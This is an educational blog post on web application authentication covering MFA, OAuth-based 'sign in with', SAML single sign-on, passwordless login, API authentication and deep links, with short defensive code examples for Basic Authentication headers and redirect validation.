Device Compatibility — Not everyone has a smartphone, which means they can't install an authentication app for soft tokens or MFA push notifications. This leaves SMS or a hard token as the only options, each of which comes with trade-offs.

There is a wonderful list of scenarios maintained by NIST and some implementation guidance by Okta for further reading.

Pro tips: For the software developers and engineers potentially reading this: it's easy to make something that should be simple, like authentication, complicated. Don't make it complicated. Avoid adding any business logic to your authentication flows. MFA bypasses based on a specific identity/username (think "testuser") are a common mistake.
Hardware tokens (something you have) remain one of the strongest multifactor solutions today, but they have high operational overhead and can be lost. Pick where you want to use them based on risk.

How does "Sign In With" Work?

If you are reading this article, I would hazard a guess that you have seen "sign in with" on various websites.

Medium's Sign in with page

Heck, even Medium has this feature. This is where you use your already established identity with another application, such as Google, Facebook, Apple, or the like, to authenticate to another application. This is possible because of widely adopted industry standards like OAuth2 and OIDC, which are used for authentication. It is worth noting that OAuth2 was purely designed as an authorization protocol, not authentication; these two terms are often confused. The kind folks in the OAuth2 community have done a fine job walking through this here. The "sign in with" capability works because you authenticate once with your Google account and then establish a trust relationship between Google and the third party application to allow access (authorization) to that application post-authentication.

Super Basic "Sign In With" Flow

Is it safe? — Generally, yes, it's safe when implemented correctly; however, there are a large number of threat scenarios to consider which unfortunately manifest in the real world (1) (2) (3). One of the biggest issues in these flows is the implicit trust placed in sign in providers, meaning applications generally trust the data in Google/Facebook/Apple to be true and accurate. The implementation isn't the only concern: the permissions across the two systems are also important. The service you are signing in to may request access to your personal data, so look out for what applications are requesting. You should also periodically review and prune based on usage.

What is Single Sign On (SSO)?
Hopefully you have read the previous section about "sign in with". The concept is quite similar, but in practice Single Sign On (SSO) usually uses a different protocol, SAML 2.0, to perform the authentication between the identity provider, IdP (Google in the previous section), and the service provider, SP (the third party application you want to access). SAML 2.0 is very similar in concept to OAuth 2.0 in that it requires an exchange of identity information between trusted parties. If you want your users to have accounts on many different services, and to selectively grant access to various applications, use OAuth (application focused). SSO is usually employed for business-to-business applications: it enables business users to maintain a single account and access many applications with it. There are quite large organizations that specialize in SSO as a product; one of the biggest is Okta.

Super Basic SSO SAML Flow

Pro Tip: Many businesses have decided to charge for SSO, despite it being an implementation of an industry standard. Feel free to peruse some known companies that do this at https://sso.tax/.

What is Passwordless Authentication?

The concept of "Passwordless" authentication is to use a non-password factor (see the list of common factors in the MFA section above) as your primary factor for authentication instead of a password. In movies this is often a retinal scan, because it looks cool. In reality, there is Apple PassKey, which is now accepted as a primary factor for consumers. This is indeed a strong way to ensure the requesting user owns the credentials being provided to the system. However, there are some drawbacks. Currently, there is a very high and difficult bar to implementing passwordless authentication at scale. The cost-benefit analysis tips toward those with lots of privileged access in organizations, similar to hard tokens.
Furthermore, the most likely passwordless factor is biometric, which raises privacy, accuracy, and data storage concerns. A human's biometrics can't be changed if compromised. Microsoft has a detailed write-up on how their passwordless implementation works, with pictures of course. The FIDO (Fast IDentity Online) Alliance is focused on open authentication standards that reduce password-based authentication. The FIDO2 standard incorporates the Web Authentication (WebAuthn) standard, which we have written about on this blog.

Pro Tip: We think passwordless authentication for consumers is still over the horizon, though Microsoft is getting close. For business users, we think players in the space are getting close, but really only for specific and highly privileged users.

What is API Authentication?

Let's first start with: What is an API? — Back to the jelly of the month subscription application example. Let's assume the jelly of the month service has a feature to enroll you in a jelly enthusiast weekly newsletter provided by a third party. In order to subscribe you to the newsletter, the jelly website will pass your email address to an API (application programming interface) that the newsletter makes available. This API will validate the jelly of the month website using some form of authentication.

Super Basic API Authentication Flow

Amazon Web Services (AWS) is one of the most prolific examples of APIs we can think of. It is an immense collection of APIs that its customers can use, mainly over HTTP, which is core to the internet. These APIs are designed to be accessible from the public internet. While they may be open to the broader internet, they require an identity to access, unless a resource is explicitly made open, such as static images for a marketing website. OK, now onto API authentication…

Basic Authentication — As indicated by its name, Basic Authentication is basic. It's a username and a password, that's all.
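A minimal sketch of what a Basic Authentication header looks like on the wire (credentials here are made up; note they are merely base64-encoded, not encrypted):

```python
import base64

# Build the RFC 7617 "Authorization: Basic <base64(user:pass)>" header.
def basic_auth_header(username, password):
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}

headers = basic_auth_header("jelly-club", "s3cret")
```

Anyone who can read the request can trivially decode the credentials, which is exactly why Basic Authentication must only be used over TLS.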
The username and password are base64 encoded and added as an HTTP header for the server to decode and validate. Note: encoding is NOT encryption. This is why TLS (HTTPS) is important.

OAuth 2.0 Access Tokens — As mentioned earlier, OAuth is a standard protocol used for authorization, but in the case of APIs it is used in a specific way in the authentication flow. OAuth has what are known as access tokens, also known as JWT bearer tokens, which are provided by an OAuth authorization server. There is a wonderful post by Nordic APIs on how this all works. These tokens authorize a relying party to act on behalf of those to whom the token is issued. They are frequently used to access user profile information such as the user's name and email address.

Mutual TLS (mTLS) — mTLS allows each party in a connection, the client and the server, to verify the other's identity. This form of authentication leverages public key cryptography and the TLS encryption protocol. Trust is acquired from known certificate authorities. This differs from plain TLS, where only the server provides its identity for verification by the client. More on the differences here.

Pro Tip: In practice you may see additional security controls placed on APIs, such as IP address or system based restrictions. This is not authentication and should be treated as a secondary factor.

Bonus: What are Deep Links?

What happens when you try to access your email and you're not logged in? You get redirected to the login page. After logging in, though, you are seamlessly redirected back to your email without having to manually navigate. How does this work? Enter deep links.

Deep links — A service provider/relying party user experience implementation detail. They allow a user to be sent directly to a specific application and/or page post-authentication. Deep links are not explicitly part of the authentication specs we have discussed, but all said specs have a means of supporting them via a pseudo-session state.
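Because that relayed state ultimately drives a post-login redirect, implementations generally have to validate it before following it. A hedged sketch of one common defensive pattern: only follow relative paths or hosts on an explicit allowlist (hosts here are made up):

```python
from urllib.parse import urlparse

ALLOWED_HOSTS = {"mail.example.com", "app.example.com"}  # illustrative allowlist

def safe_redirect_target(target, default="/"):
    parsed = urlparse(target)
    if not parsed.scheme and not parsed.netloc:
        # Relative path: accept only absolute paths, reject protocol-relative "//host"
        return target if target.startswith("/") and not target.startswith("//") else default
    if parsed.scheme == "https" and parsed.hostname in ALLOWED_HOSTS:
        return target                               # allowlisted absolute URL
    return default                                  # anything else: fall back

ok = safe_redirect_target("/inbox/42")
blocked = safe_redirect_target("https://evil.example.net/phish")
```

Skipping a check like this is how open-redirect bugs end up in login flows.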
In SAML2, this is the "RelayState" parameter. In OAuth2/OIDC, this is the "state" parameter. An identity provider or authorization server will always send this value back to the service provider/relying party post-authentication.

Deep links are a type of link that sends users directly to an app instead of a website or an app store. They are used to send users straight to specific in-app locations, saving users the time and energy of locating a particular page themselves and significantly improving the user experience. Deep linking does this by specifying a custom URL scheme (iOS Universal Links) or an intent URL (on Android devices) that opens your app if it's already installed. Deep links can also be set to direct users to specific events or pages, which could tie into campaigns that you may want to run.

Pro tip: Deep links, and any authentication flow for that matter, can be fraught with security considerations that need to be accounted for. Issues such as open redirects, cross-site request forgeries, and clickjacking are serious concerns with authentication.

Takeaways

Authentication is a simple process to validate a registered identity within an application. There are a lot of security implications to getting authentication wrong, which is why getting it right is so important.
Authorization is not authentication. It is the process to confirm an authenticated identity has access to something.
Passwords alone are no longer adequate to keep applications secure. MFA is here to stay for now and needs serious consideration by those companies who haven't implemented it yet. For the strongest MFA today, use a hard token, but know that comes at a high management cost.
There is a lot of behind-the-scenes magic that happens to make authentication as frictionless as possible. The use of "sign in with" and Single Sign On (SSO) is becoming more widely adopted, which is fine, but be sure you review the permissions and data of each application.
We are eager for a phishing-resistant and passwordless authentication solution, but there are a lot of challenges ahead in finding the right balance between cost and reward. Innovations happening today with FIDO2, WebAuthn, and privacy standards are beginning to help.
Even more complicated authentication workflows, like deep links, make it convenient for the end user to get to resources but can be vulnerable to many different issues.
For the security practitioners reading, we recommend you find the time to review your company's authentication implementations.

Words of Wisdom

Authentication isn't something we can simply ignore. Despite our collective decades of experience implementing and securing authentication for companies, we remain curious as it evolves over time.

The only true wisdom is in knowing you know nothing. — Socrates

Contributions and Thanks

A special thanks to those who helped peer review and make this post as useful as it is: Marshall Hallenbeck, Keshav Malik, Abishek Patole, Evan Helbig, Byron Arnao, Sean McConnell, Luke Young, and Anand Vemuri. A special thanks to you, the reader. We hope you benefited from it in some way, and we want everyone to be successful at this. While these posts aren't a silver bullet, we hope they get you started. Please do follow our page if you enjoy this and our other posts. More to come!

Sursa: https://betterappsec.com/a-medium-dive-into-web-application-authentication-342d1d002a61